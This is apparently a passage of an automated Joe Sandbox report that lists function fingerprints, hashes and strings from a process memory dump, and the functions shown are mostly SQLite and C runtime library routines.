Similarity

API ID:
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
API String ID: 0-3705377941
Opcode ID: 2b812f4b891c20f0aaa6a91422a6cfa059cac5b3a202be4f458c199a6158ed3e
Instruction ID: 44141157a714388165548e9969235f653f85a49541ff79c8190ddc887cb060fa
Opcode Fuzzy Hash: 2b812f4b891c20f0aaa6a91422a6cfa059cac5b3a202be4f458c199a6158ed3e
Instruction Fuzzy Hash: 3C21D1B09181219BDB009F2CD884B6A7B75AF023B5F104369F915DB291DB25E491CBB2

Function 1D7533C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 1D7533D6

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
API String ID: 0-1935849370
Opcode ID: a23079bdf3799a1523807a45537c61d78ed7ad1ed0ac587368151a3171a7c18a
Instruction ID: 59d2a97f0f6be2155d7fcb1e3de87f38b1228a65ab3b12be5330036d9be5dbc2
Opcode Fuzzy Hash: a23079bdf3799a1523807a45537c61d78ed7ad1ed0ac587368151a3171a7c18a
Instruction Fuzzy Hash: DE0192397442169AD301DF29E800B9AB3D5EFC5322F1A817BF6048B250EB70A48787A3

Function 1D813E10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

SELECT count(*) FROM %Q.'%q%s', xrefs: 1D813E26
Wrong number of entries in %%%s table - expected %lld, actual %lld, xrefs: 1D813E6C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: SELECT count(*) FROM %Q.'%q%s'$Wrong number of entries in %%%s table - expected %lld, actual %lld
API String ID: 0-3026403748
Opcode ID: c74277f92b1a2e6c23f2d5f8bd61ab11103bb814324993f82cb5dfd1d1910a4f
Instruction ID: d997eb15447e0e425c2da4e549a9a9346da421d7bbac68f7aec6eaa1cfdc97eb
Opcode Fuzzy Hash: c74277f92b1a2e6c23f2d5f8bd61ab11103bb814324993f82cb5dfd1d1910a4f
Instruction Fuzzy Hash: 68F078B6C08341BFDB129B08EC80E3F36E5BFC4620F06082CF18A66521D325F5589763

Function 1D8E5BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CE37D569,?,?,00000000,1D93D1CB,000000FF,?,1D8E5B30,?,?,1D8E5ADF,?), ref: 1D8E5BF6
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,1D93D1CB,000000FF,?,1D8E5B30,?,?,1D8E5ADF,?), ref: 1D8E5C08
FreeLibrary.KERNEL32(00000000,?,?,00000000,1D93D1CB,000000FF,?,1D8E5B30,?,?,1D8E5ADF,?), ref: 1D8E5C2A

Strings

CorExitProcess, xrefs: 1D8E5C00
mscoree.dll, xrefs: 1D8E5BEF

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d236b6fca17a3635dfa342dd51fd8ccf83084f6b945305f8dbf748f57ea48eaa
Instruction ID: 2a214860602a20225dbb4da1c16b39eadf1c7974e530b172be2b346fee2c1071
Opcode Fuzzy Hash: d236b6fca17a3635dfa342dd51fd8ccf83084f6b945305f8dbf748f57ea48eaa
Instruction Fuzzy Hash: D5018635918529FFDF018F94CD44BBEB7B8FB46751F000A69F815A2290DB78A900DE91

Function 1D856A20 Relevance: 8.0, APIs: 5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07475b4640544d698e1f907dfe8b4548b39635537f4a6ee8e2151293bd1b60a9
Instruction ID: 30ac4edaf9441a607cbc5fab2039d30c183603a47b065be947fc9345fa18c4ff
Opcode Fuzzy Hash: 07475b4640544d698e1f907dfe8b4548b39635537f4a6ee8e2151293bd1b60a9
Instruction Fuzzy Hash: 7F0288B0908346DBC700DF28E885B2AB7F4BF45358F044A6DF9499B211EB75E954CBA3

Function 1D7BAF80 Relevance: 7.8, APIs: 5, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77767a32d18c33a10dc3277d9abe722dcdd3f7bf1fa163fe5e489e0090fd71fc
Instruction ID: 125e87d909dd04929b8332d4b65c823dc89959e825864f83a732f8da2fd6ef04
Opcode Fuzzy Hash: 77767a32d18c33a10dc3277d9abe722dcdd3f7bf1fa163fe5e489e0090fd71fc
Instruction Fuzzy Hash: 7DA16D70919621DBD7209F25D8C8B7A3778BF022E6F050266EC0697211DB39E564CFB7

Function 1D8573C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

fts5: syntax error near "%.*s", xrefs: 1D85751C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: fts5: syntax error near "%.*s"
API String ID: 0-498961494
Opcode ID: 7ccb9eef840e895d7696ea85395512b0e4401cc14221f6b762dbea41067b4154
Instruction ID: cd95f8ac367fd51e709ab39780072de68d285763b3526dc0fb02705b159e377e
Opcode Fuzzy Hash: 7ccb9eef840e895d7696ea85395512b0e4401cc14221f6b762dbea41067b4154
Instruction Fuzzy Hash: 70B1BCB08083519FCB11DF28C884B6ABBE8BF45358F14891DF9898B251E774E585CFA7

Function 1D770F60 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 264COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D771287
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D77126C, 1D771278
database corruption, xrefs: 1D771282

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 3d46d9a7437466a2b8ff5b202339bfef02eae1924a8f53068bd1345388712e3d
Instruction ID: c63be0fea366b270c54f1cad4eefa2ca64ced2d2d0cdf29ed52fc6a0d20b172d
Opcode Fuzzy Hash: 3d46d9a7437466a2b8ff5b202339bfef02eae1924a8f53068bd1345388712e3d
Instruction Fuzzy Hash: 57A1BD746083518FDB05CF28E888B3737F6BB41264F054A6EED5A8B212E735E554CBA3

Function 1D7582E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 220COMMON

Download Yara Rule

Strings

[%d], xrefs: 1D7584C7

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: [%d]
API String ID: 0-394612830
Opcode ID: b058a03e2875a3d94cf1016ef3624112a60e59a74bc390293cc0781bc0dcff68
Instruction ID: 2dcda14f88807f0fc0ec3bc019cf99c0456a5f456f19bf521b43faacb7d5017f
Opcode Fuzzy Hash: b058a03e2875a3d94cf1016ef3624112a60e59a74bc390293cc0781bc0dcff68
Instruction Fuzzy Hash: B2713BB5908344AFDB21CE20DC85FA777E9AF85724F44891EEA8587191E338F5098763

Function 1D836180 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 216COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D836396
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D836387
database corruption, xrefs: 1D836391

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: d244006a4f10ea6d67cbc360a96cf72f49a09bef9282d72577be4bec7da43476
Instruction ID: b528956da0eaa688f5f2bbc1753b6b727fa1df2a03bef04ad027dbdcc455c1f3
Opcode Fuzzy Hash: d244006a4f10ea6d67cbc360a96cf72f49a09bef9282d72577be4bec7da43476
Instruction Fuzzy Hash: EE71E571A08241ABDB04DF1CD8C26BA77E4EF4432AF950559F89DC7252E335E844C793

Function 1D7713A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 214COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D771468
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D771459
database corruption, xrefs: 1D771463

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 4cfdf0f0b938772f43c2f3089a9b226ef18911b841d3081b99d8b35732ae4cf8
Instruction ID: 5bb180e39e36e8f2fefe1d89927e4764862d9d6087f7cba6f88978050111f2fc
Opcode Fuzzy Hash: 4cfdf0f0b938772f43c2f3089a9b226ef18911b841d3081b99d8b35732ae4cf8
Instruction Fuzzy Hash: 9B7119B66043009FCB05CF24D884A6777E5AF88324F158A99FD8DDB252D731E945CB93

Function 1D747D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

winShmMap3, xrefs: 1D747F1D
winShmMap1, xrefs: 1D747DC5
winShmMap2, xrefs: 1D747E1F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 0-3826999013
Opcode ID: 0ecf7c7bc23be2d8e63198e2b1e1d7f348f75e1d2b28ef40cab080bc7fddfcd4
Instruction ID: 69e417fd52d005632387399398c9237df2e136557273e42ce0c7eef5ebd48a47
Opcode Fuzzy Hash: 0ecf7c7bc23be2d8e63198e2b1e1d7f348f75e1d2b28ef40cab080bc7fddfcd4
Instruction Fuzzy Hash: 0161BD715043019FDB12CF29C885B27B7E5AF84764F21896EE98697251EB34E805CBD2

Function 1D8E0FC2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 1D8E0FE7
CatchIt.LIBVCRUNTIME ref: 1D8E10CD

Strings

MOC, xrefs: 1D8E0FF9
RCC, xrefs: 1D8E1001

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 28b2b590da160f0e36b1841d5aa337ab5d2ddbdae1b6215acf4ca71a71923402
Instruction ID: 88f4adc3035384229f87d32fd494fb9728f76be3a8c27e1e2cc2c213b2456695
Opcode Fuzzy Hash: 28b2b590da160f0e36b1841d5aa337ab5d2ddbdae1b6215acf4ca71a71923402
Instruction Fuzzy Hash: 48415671900289EFCF05CF94D980AEEBBB5FF49340F158299FA08A7221D335A950DF52

Function 1D773060 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 184COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D7730A1
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D773092
database corruption, xrefs: 1D77309C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: db5db909be633267abe19cfac6263290f834ee6c1914e7547eb4107c94536c7f
Instruction ID: a12c00e3cb5ae4f62b5c23e9b3b95d74d8760334a08a8a23ab58a2c4ca56a80b
Opcode Fuzzy Hash: db5db909be633267abe19cfac6263290f834ee6c1914e7547eb4107c94536c7f
Instruction Fuzzy Hash: B861D4755083059FCB04CF68C881A6BBBE4BF88714F41495EFA9887342E735E945CBA3

Function 1D73DE5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

(subquery-%u), xrefs: 1D73DFB3
(join-%u), xrefs: 1D73DFA1

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: (join-%u)$(subquery-%u)
API String ID: 0-2916047017
Opcode ID: f4177daf25f6edef136a72716265e1235f8f0145d0e9d20094de2d89f4044afc
Instruction ID: 013e5b12fa9e2a8bbde37f78d57f428c0eafc9132ab4b877bef2b9115a457825
Opcode Fuzzy Hash: f4177daf25f6edef136a72716265e1235f8f0145d0e9d20094de2d89f4044afc
Instruction Fuzzy Hash: E651F675608342ABCB18CF28D8D492777A1BF85726F058A5DEC6A4B217E735E401CB93

Function 1D744CE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

temp, xrefs: 1D7D3F91
wrong number of vtable arguments, xrefs: 1D7D3FA9

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
